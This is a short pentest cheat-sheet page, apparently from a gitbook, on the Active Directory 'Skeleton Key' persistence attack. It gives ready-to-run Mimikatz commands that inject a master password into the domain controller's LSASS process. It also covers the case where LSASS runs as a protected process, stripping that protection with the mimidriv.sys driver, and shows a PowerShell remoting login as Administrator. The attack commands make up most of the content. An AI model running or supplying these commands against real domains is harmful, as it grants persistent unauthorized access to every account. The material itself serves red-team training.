Skeleton Key

Skeleton key is a persistence technique where it is possible to inject malware to the Domain Controller LSASS process so that it allows access as any user with a single password.

Important to know:

Require Domain Admin privileges
Skeleton Key is not persistent across reboots
Skeleton Key is not opsec safe and is also known to cause issues with AD CS

Inject a skeleton key

# needs DA privs
# password would be "mimikatz"
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"'

Access any machine

Enter-PSSession -Computername dcorp-dc -credential dcorp\Administrator

LSASS running as a protected process

In case Lsass is running as a protected process, we can still use Skeleton Key but it needs the mimikatz driver (mimidriv.sys) on disk of the target DC

mimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

more detailed

Skeleton Key Attack | Pentest Everythingviperone.gitbook.io

Last updated 1 year ago

hashtagImportant to know:

hashtagInject a skeleton key

hashtagAccess any machine

hashtagLSASS running as a protected process

Important to know:

Inject a skeleton key

Access any machine

LSASS running as a protected process